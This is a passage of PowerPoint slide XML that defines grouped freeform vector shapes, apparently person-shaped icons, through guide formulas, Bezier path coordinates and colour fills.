              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71A5ED0-9F94-4FF5-8246-B34C814F8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2564" y="11479213"/>
              <a:ext cx="128588" cy="46038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 283 w 309"/>
                <a:gd name="T1" fmla="*/ 110 h 110"/>
                <a:gd name="T2" fmla="*/ 270 w 309"/>
                <a:gd name="T3" fmla="*/ 106 h 110"/>
                <a:gd name="T4" fmla="*/ 24 w 309"/>
                <a:gd name="T5" fmla="*/ 49 h 110"/>
                <a:gd name="T6" fmla="*/ 0 w 309"/>
                <a:gd name="T7" fmla="*/ 27 h 110"/>
                <a:gd name="T8" fmla="*/ 23 w 309"/>
                <a:gd name="T9" fmla="*/ 3 h 110"/>
                <a:gd name="T10" fmla="*/ 295 w 309"/>
                <a:gd name="T11" fmla="*/ 67 h 110"/>
                <a:gd name="T12" fmla="*/ 302 w 309"/>
                <a:gd name="T13" fmla="*/ 99 h 110"/>
                <a:gd name="T14" fmla="*/ 283 w 309"/>
                <a:gd name="T15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9" h="110">
                  <a:moveTo>
                    <a:pt x="283" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="110"/>
                    <a:pt x="274" y="109"/>
                    <a:pt x="270" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="47"/>
                    <a:pt x="26" y="50"/>
                    <a:pt x="24" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="50"/>
                    <a:pt x="1" y="39"/>
                    <a:pt x="0" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14"/>
                    <a:pt x="10" y="3"/>
                    <a:pt x="23" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="2"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="295" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="74"/>
                    <a:pt x="309" y="88"/>
                    <a:pt x="302" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="106"/>
                    <a:pt x="290" y="110"/>
                    <a:pt x="283" y="1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78" name="Freeform 667">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF45120-40F6-47F7-A775-332E905DA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9051" y="11715751"/>
              <a:ext cx="150813" cy="323850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 366"/>
                <a:gd name="T1" fmla="*/ 780 h 780"/>
                <a:gd name="T2" fmla="*/ 3 w 366"/>
                <a:gd name="T3" fmla="*/ 757 h 780"/>
                <a:gd name="T4" fmla="*/ 3 w 366"/>
                <a:gd name="T5" fmla="*/ 453 h 780"/>
                <a:gd name="T6" fmla="*/ 85 w 366"/>
                <a:gd name="T7" fmla="*/ 273 h 780"/>
                <a:gd name="T8" fmla="*/ 320 w 366"/>
                <a:gd name="T9" fmla="*/ 167 h 780"/>
                <a:gd name="T10" fmla="*/ 320 w 366"/>
                <a:gd name="T11" fmla="*/ 23 h 780"/>
                <a:gd name="T12" fmla="*/ 343 w 366"/>
                <a:gd name="T13" fmla="*/ 0 h 780"/>
                <a:gd name="T14" fmla="*/ 366 w 366"/>
                <a:gd name="T15" fmla="*/ 23 h 780"/>
                <a:gd name="T16" fmla="*/ 366 w 366"/>
                <a:gd name="T17" fmla="*/ 182 h 780"/>
                <a:gd name="T18" fmla="*/ 352 w 366"/>
                <a:gd name="T19" fmla="*/ 204 h 780"/>
                <a:gd name="T20" fmla="*/ 107 w 366"/>
                <a:gd name="T21" fmla="*/ 314 h 780"/>
                <a:gd name="T22" fmla="*/ 49 w 366"/>
                <a:gd name="T23" fmla="*/ 453 h 780"/>
                <a:gd name="T24" fmla="*/ 49 w 366"/>
                <a:gd name="T25" fmla="*/ 757 h 780"/>
                <a:gd name="T26" fmla="*/ 26 w 366"/>
                <a:gd name="T27" fmla="*/ 780 h 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6" h="780">
                  <a:moveTo>
                    <a:pt x="26" y="780"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="780"/>
                    <a:pt x="3" y="770"/>
                    <a:pt x="3" y="757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="453"/>
                    <a:pt x="3" y="453"/>
                    <a:pt x="3" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="449"/>
                    <a:pt x="0" y="320"/>
                    <a:pt x="85" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="240"/>
                    <a:pt x="276" y="185"/>
                    <a:pt x="320" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="23"/>
                    <a:pt x="320" y="23"/>
                    <a:pt x="320" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="10"/>
                    <a:pt x="330" y="0"/>
                    <a:pt x="343" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="0"/>
                    <a:pt x="366" y="10"/>
                    <a:pt x="366" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="182"/>
                    <a:pt x="366" y="182"/>
                    <a:pt x="366" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="192"/>
                    <a:pt x="361" y="200"/>
                    <a:pt x="352" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="204"/>
                    <a:pt x="178" y="275"/>
                    <a:pt x="107" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="347"/>
                    <a:pt x="49" y="452"/>
                    <a:pt x="49" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="757"/>
                    <a:pt x="49" y="757"/>
                    <a:pt x="49" y="757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="770"/>
                    <a:pt x="39" y="780"/>
                    <a:pt x="26" y="7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881AE8B7-5628-4CE0-8D60-EAA881AB2514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3244608" y="3941372"/>
            <a:ext cx="423200" cy="605228"/>
            <a:chOff x="10847388" y="9572625"/>
            <a:chExt cx="442913" cy="633413"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="380" name="Freeform 1084">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64915075-C23C-4C61-B21C-BD17C77056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3738" y="9698038"/>
              <a:ext cx="65088" cy="320675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 159"/>
                <a:gd name="T1" fmla="*/ 774 h 774"/>
                <a:gd name="T2" fmla="*/ 53 w 159"/>
                <a:gd name="T3" fmla="*/ 751 h 774"/>
                <a:gd name="T4" fmla="*/ 53 w 159"/>
                <a:gd name="T5" fmla="*/ 709 h 774"/>
                <a:gd name="T6" fmla="*/ 74 w 159"/>
                <a:gd name="T7" fmla="*/ 603 h 774"/>
                <a:gd name="T8" fmla="*/ 89 w 159"/>
                <a:gd name="T9" fmla="*/ 574 h 774"/>
                <a:gd name="T10" fmla="*/ 52 w 159"/>
                <a:gd name="T11" fmla="*/ 471 h 774"/>
                <a:gd name="T12" fmla="*/ 23 w 159"/>
                <a:gd name="T13" fmla="*/ 428 h 774"/>
                <a:gd name="T14" fmla="*/ 46 w 159"/>
                <a:gd name="T15" fmla="*/ 201 h 774"/>
                <a:gd name="T16" fmla="*/ 87 w 159"/>
                <a:gd name="T17" fmla="*/ 20 h 774"/>
                <a:gd name="T18" fmla="*/ 115 w 159"/>
                <a:gd name="T19" fmla="*/ 2 h 774"/>
                <a:gd name="T20" fmla="*/ 133 w 159"/>
                <a:gd name="T21" fmla="*/ 30 h 774"/>
                <a:gd name="T22" fmla="*/ 91 w 159"/>
                <a:gd name="T23" fmla="*/ 212 h 774"/>
                <a:gd name="T24" fmla="*/ 65 w 159"/>
                <a:gd name="T25" fmla="*/ 408 h 774"/>
                <a:gd name="T26" fmla="*/ 89 w 159"/>
                <a:gd name="T27" fmla="*/ 444 h 774"/>
                <a:gd name="T28" fmla="*/ 130 w 159"/>
                <a:gd name="T29" fmla="*/ 595 h 774"/>
                <a:gd name="T30" fmla="*/ 115 w 159"/>
                <a:gd name="T31" fmla="*/ 624 h 774"/>
                <a:gd name="T32" fmla="*/ 99 w 159"/>
                <a:gd name="T33" fmla="*/ 709 h 774"/>
                <a:gd name="T34" fmla="*/ 99 w 159"/>
                <a:gd name="T35" fmla="*/ 751 h 774"/>
                <a:gd name="T36" fmla="*/ 76 w 159"/>
                <a:gd name="T37" fmla="*/ 7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774">
                  <a:moveTo>
                    <a:pt x="76" y="774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="774"/>
                    <a:pt x="53" y="764"/>
                    <a:pt x="53" y="751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="734"/>
                    <a:pt x="53" y="721"/>
                    <a:pt x="53" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="648"/>
                    <a:pt x="52" y="643"/>
                    <a:pt x="74" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="595"/>
                    <a:pt x="83" y="586"/>
                    <a:pt x="89" y="574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="545"/>
                    <a:pt x="83" y="513"/>
                    <a:pt x="52" y="471"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="456"/>
                    <a:pt x="30" y="442"/>
                    <a:pt x="23" y="428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="380"/>
                    <a:pt x="18" y="309"/>
                    <a:pt x="46" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="149"/>
                    <a:pt x="73" y="90"/>
                    <a:pt x="87" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="8"/>
                    <a:pt x="102" y="0"/>
                    <a:pt x="115" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="5"/>
                    <a:pt x="135" y="17"/>
                    <a:pt x="133" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="100"/>
                    <a:pt x="104" y="159"/>
                    <a:pt x="91" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="307"/>
                    <a:pt x="50" y="375"/>
                    <a:pt x="65" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="418"/>
                    <a:pt x="79" y="430"/>
                    <a:pt x="89" y="444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="483"/>
                    <a:pt x="159" y="537"/>
                    <a:pt x="130" y="595"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="607"/>
                    <a:pt x="119" y="616"/>
                    <a:pt x="115" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="655"/>
                    <a:pt x="99" y="655"/>
                    <a:pt x="99" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="720"/>
                    <a:pt x="99" y="734"/>
                    <a:pt x="99" y="751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="764"/>
                    <a:pt x="89" y="774"/>
                    <a:pt x="76" y="7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1" name="Freeform 1085">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{185A0B01-5206-4A5B-B71E-7DD0C305B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7238" y="9572625"/>
              <a:ext cx="373063" cy="454025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 770 w 898"/>
                <a:gd name="T1" fmla="*/ 1095 h 1095"/>
                <a:gd name="T2" fmla="*/ 752 w 898"/>
                <a:gd name="T3" fmla="*/ 1086 h 1095"/>
                <a:gd name="T4" fmla="*/ 756 w 898"/>
                <a:gd name="T5" fmla="*/ 1054 h 1095"/>
                <a:gd name="T6" fmla="*/ 809 w 898"/>
                <a:gd name="T7" fmla="*/ 869 h 1095"/>
                <a:gd name="T8" fmla="*/ 663 w 898"/>
                <a:gd name="T9" fmla="*/ 330 h 1095"/>
                <a:gd name="T10" fmla="*/ 327 w 898"/>
                <a:gd name="T11" fmla="*/ 47 h 1095"/>
                <a:gd name="T12" fmla="*/ 44 w 898"/>
                <a:gd name="T13" fmla="*/ 193 h 1095"/>
                <a:gd name="T14" fmla="*/ 12 w 898"/>
                <a:gd name="T15" fmla="*/ 198 h 1095"/>
                <a:gd name="T16" fmla="*/ 7 w 898"/>
                <a:gd name="T17" fmla="*/ 165 h 1095"/>
                <a:gd name="T18" fmla="*/ 327 w 898"/>
                <a:gd name="T19" fmla="*/ 0 h 1095"/>
                <a:gd name="T20" fmla="*/ 710 w 898"/>
                <a:gd name="T21" fmla="*/ 326 h 1095"/>
                <a:gd name="T22" fmla="*/ 851 w 898"/>
                <a:gd name="T23" fmla="*/ 851 h 1095"/>
                <a:gd name="T24" fmla="*/ 785 w 898"/>
                <a:gd name="T25" fmla="*/ 1090 h 1095"/>
                <a:gd name="T26" fmla="*/ 770 w 898"/>
                <a:gd name="T27" fmla="*/ 1095 h 10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98" h="1095">
                  <a:moveTo>
                    <a:pt x="770" y="1095"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="763" y="1095"/>
                    <a:pt x="757" y="1092"/>
                    <a:pt x="752" y="1086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="744" y="1076"/>
                    <a:pt x="746" y="1062"/>
                    <a:pt x="756" y="1054"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="760" y="1051"/>
                    <a:pt x="853" y="974"/>
                    <a:pt x="809" y="869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="728" y="677"/>
                    <a:pt x="679" y="496"/>
                    <a:pt x="663" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="649" y="185"/>
                    <a:pt x="486" y="47"/>
                    <a:pt x="327" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="47"/>
                    <a:pt x="113" y="103"/>
                    <a:pt x="44" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="203"/>
                    <a:pt x="22" y="205"/>
                    <a:pt x="12" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="190"/>
                    <a:pt x="0" y="175"/>
                    <a:pt x="7" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="64"/>
                    <a:pt x="207" y="0"/>
                    <a:pt x="327" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="0"/>
                    <a:pt x="694" y="159"/>
                    <a:pt x="710" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="487"/>
                    <a:pt x="773" y="664"/>
                    <a:pt x="851" y="851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="898" y="961"/>
                    <a:pt x="828" y="1056"/>
                    <a:pt x="785" y="1090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="780" y="1094"/>
                    <a:pt x="775" y="1095"/>
                    <a:pt x="770" y="10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2" name="Freeform 1086">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA44E92D-2F2A-402B-BA6E-0E50114C5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7238" y="9690100"/>
              <a:ext cx="273050" cy="236538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 327 w 657"/>
                <a:gd name="T1" fmla="*/ 569 h 569"/>
                <a:gd name="T2" fmla="*/ 0 w 657"/>
                <a:gd name="T3" fmla="*/ 248 h 569"/>
                <a:gd name="T4" fmla="*/ 23 w 657"/>
                <a:gd name="T5" fmla="*/ 225 h 569"/>
                <a:gd name="T6" fmla="*/ 23 w 657"/>
                <a:gd name="T7" fmla="*/ 225 h 569"/>
                <a:gd name="T8" fmla="*/ 47 w 657"/>
                <a:gd name="T9" fmla="*/ 248 h 569"/>
                <a:gd name="T10" fmla="*/ 327 w 657"/>
                <a:gd name="T11" fmla="*/ 523 h 569"/>
                <a:gd name="T12" fmla="*/ 531 w 657"/>
                <a:gd name="T13" fmla="*/ 447 h 569"/>
                <a:gd name="T14" fmla="*/ 607 w 657"/>
                <a:gd name="T15" fmla="*/ 263 h 569"/>
                <a:gd name="T16" fmla="*/ 236 w 657"/>
                <a:gd name="T17" fmla="*/ 64 h 569"/>
                <a:gd name="T18" fmla="*/ 155 w 657"/>
                <a:gd name="T19" fmla="*/ 139 h 569"/>
                <a:gd name="T20" fmla="*/ 122 w 657"/>
                <a:gd name="T21" fmla="*/ 137 h 569"/>
                <a:gd name="T22" fmla="*/ 124 w 657"/>
                <a:gd name="T23" fmla="*/ 105 h 569"/>
                <a:gd name="T24" fmla="*/ 211 w 657"/>
                <a:gd name="T25" fmla="*/ 24 h 569"/>
                <a:gd name="T26" fmla="*/ 225 w 657"/>
                <a:gd name="T27" fmla="*/ 18 h 569"/>
                <a:gd name="T28" fmla="*/ 651 w 657"/>
                <a:gd name="T29" fmla="*/ 248 h 569"/>
                <a:gd name="T30" fmla="*/ 600 w 657"/>
                <a:gd name="T31" fmla="*/ 434 h 569"/>
                <a:gd name="T32" fmla="*/ 327 w 657"/>
                <a:gd name="T33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7" h="569">
                  <a:moveTo>
                    <a:pt x="327" y="569"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="569"/>
                    <a:pt x="0" y="251"/>
                    <a:pt x="0" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="235"/>
                    <a:pt x="10" y="225"/>
                    <a:pt x="23" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="225"/>
                    <a:pt x="23" y="225"/>
                    <a:pt x="23" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="225"/>
                    <a:pt x="46" y="235"/>
                    <a:pt x="47" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="259"/>
                    <a:pt x="55" y="523"/>
                    <a:pt x="327" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="523"/>
                    <a:pt x="483" y="497"/>
                    <a:pt x="531" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="598" y="378"/>
                    <a:pt x="606" y="282"/>
                    <a:pt x="607" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="70"/>
                    <a:pt x="282" y="64"/>
                    <a:pt x="236" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="139"/>
                    <a:pt x="155" y="139"/>
                    <a:pt x="155" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="147"/>
                    <a:pt x="131" y="147"/>
                    <a:pt x="122" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="128"/>
                    <a:pt x="114" y="113"/>
                    <a:pt x="124" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="24"/>
                    <a:pt x="211" y="24"/>
                    <a:pt x="211" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="20"/>
                    <a:pt x="220" y="18"/>
                    <a:pt x="225" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="17"/>
                    <a:pt x="531" y="0"/>
                    <a:pt x="651" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="657" y="261"/>
                    <a:pt x="651" y="355"/>
                    <a:pt x="600" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="561" y="496"/>
                    <a:pt x="481" y="569"/>
                    <a:pt x="327" y="5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3" name="Freeform 1087">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F530F137-3C2C-4719-8B53-5BAE14244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7388" y="9894888"/>
              <a:ext cx="146050" cy="311150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 351"/>
                <a:gd name="T1" fmla="*/ 751 h 751"/>
                <a:gd name="T2" fmla="*/ 3 w 351"/>
                <a:gd name="T3" fmla="*/ 728 h 751"/>
                <a:gd name="T4" fmla="*/ 3 w 351"/>
                <a:gd name="T5" fmla="*/ 427 h 751"/>
                <a:gd name="T6" fmla="*/ 81 w 351"/>
                <a:gd name="T7" fmla="*/ 255 h 751"/>
                <a:gd name="T8" fmla="*/ 304 w 351"/>
                <a:gd name="T9" fmla="*/ 141 h 751"/>
                <a:gd name="T10" fmla="*/ 304 w 351"/>
                <a:gd name="T11" fmla="*/ 23 h 751"/>
                <a:gd name="T12" fmla="*/ 327 w 351"/>
                <a:gd name="T13" fmla="*/ 0 h 751"/>
                <a:gd name="T14" fmla="*/ 351 w 351"/>
                <a:gd name="T15" fmla="*/ 23 h 751"/>
                <a:gd name="T16" fmla="*/ 351 w 351"/>
                <a:gd name="T17" fmla="*/ 155 h 751"/>
                <a:gd name="T18" fmla="*/ 338 w 351"/>
                <a:gd name="T19" fmla="*/ 176 h 751"/>
                <a:gd name="T20" fmla="*/ 103 w 351"/>
                <a:gd name="T21" fmla="*/ 295 h 751"/>
                <a:gd name="T22" fmla="*/ 49 w 351"/>
                <a:gd name="T23" fmla="*/ 426 h 751"/>
                <a:gd name="T24" fmla="*/ 49 w 351"/>
                <a:gd name="T25" fmla="*/ 728 h 751"/>
                <a:gd name="T26" fmla="*/ 26 w 351"/>
                <a:gd name="T27" fmla="*/ 751 h 7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1" h="751">
                  <a:moveTo>
                    <a:pt x="26" y="751"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="751"/>
                    <a:pt x="3" y="740"/>
                    <a:pt x="3" y="728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="427"/>
                    <a:pt x="3" y="427"/>
                    <a:pt x="3" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="422"/>
                    <a:pt x="0" y="299"/>
                    <a:pt x="81" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="223"/>
                    <a:pt x="264" y="161"/>
                    <a:pt x="304" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="23"/>
                    <a:pt x="304" y="23"/>
                    <a:pt x="304" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="11"/>
                    <a:pt x="315" y="0"/>
                    <a:pt x="327" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="0"/>
                    <a:pt x="351" y="11"/>
                    <a:pt x="351" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="155"/>
                    <a:pt x="351" y="155"/>
                    <a:pt x="351" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="164"/>
                    <a:pt x="346" y="172"/>
                    <a:pt x="338" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="177"/>
                    <a:pt x="172" y="258"/>
                    <a:pt x="103" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="326"/>
                    <a:pt x="49" y="425"/>
                    <a:pt x="49" y="426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="728"/>
                    <a:pt x="49" y="728"/>
                    <a:pt x="49" y="728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="740"/>
                    <a:pt x="39" y="751"/>
                    <a:pt x="26" y="7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4" name="Freeform 1088">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E9DD02-A22D-4AB3-8895-CABB8D95C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5676" y="9893300"/>
              <a:ext cx="146050" cy="312738"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 325 w 351"/>
                <a:gd name="T1" fmla="*/ 754 h 754"/>
                <a:gd name="T2" fmla="*/ 302 w 351"/>
                <a:gd name="T3" fmla="*/ 731 h 754"/>
                <a:gd name="T4" fmla="*/ 302 w 351"/>
                <a:gd name="T5" fmla="*/ 427 h 754"/>
                <a:gd name="T6" fmla="*/ 247 w 351"/>
                <a:gd name="T7" fmla="*/ 295 h 754"/>
                <a:gd name="T8" fmla="*/ 14 w 351"/>
                <a:gd name="T9" fmla="*/ 182 h 754"/>
                <a:gd name="T10" fmla="*/ 0 w 351"/>
                <a:gd name="T11" fmla="*/ 160 h 754"/>
                <a:gd name="T12" fmla="*/ 0 w 351"/>
                <a:gd name="T13" fmla="*/ 23 h 754"/>
                <a:gd name="T14" fmla="*/ 24 w 351"/>
                <a:gd name="T15" fmla="*/ 0 h 754"/>
                <a:gd name="T16" fmla="*/ 47 w 351"/>
                <a:gd name="T17" fmla="*/ 23 h 754"/>
                <a:gd name="T18" fmla="*/ 47 w 351"/>
                <a:gd name="T19" fmla="*/ 146 h 754"/>
                <a:gd name="T20" fmla="*/ 270 w 351"/>
                <a:gd name="T21" fmla="*/ 254 h 754"/>
                <a:gd name="T22" fmla="*/ 348 w 351"/>
                <a:gd name="T23" fmla="*/ 427 h 754"/>
                <a:gd name="T24" fmla="*/ 348 w 351"/>
                <a:gd name="T25" fmla="*/ 731 h 754"/>
                <a:gd name="T26" fmla="*/ 325 w 351"/>
                <a:gd name="T27" fmla="*/ 754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1" h="754">
                  <a:moveTo>
                    <a:pt x="325" y="754"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="754"/>
                    <a:pt x="302" y="744"/>
                    <a:pt x="302" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="427"/>
                    <a:pt x="302" y="427"/>
                    <a:pt x="302" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="425"/>
                    <a:pt x="303" y="326"/>
                    <a:pt x="247" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="258"/>
                    <a:pt x="15" y="182"/>
                    <a:pt x="14" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="178"/>
                    <a:pt x="0" y="170"/>
                    <a:pt x="0" y="16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1" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="0"/>
                    <a:pt x="47" y="10"/>
                    <a:pt x="47" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="146"/>
                    <a:pt x="47" y="146"/>
                    <a:pt x="47" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="165"/>
                    <a:pt x="211" y="222"/>
                    <a:pt x="270" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="298"/>
                    <a:pt x="349" y="422"/>
                    <a:pt x="348" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="731"/>
                    <a:pt x="348" y="731"/>
                    <a:pt x="348" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
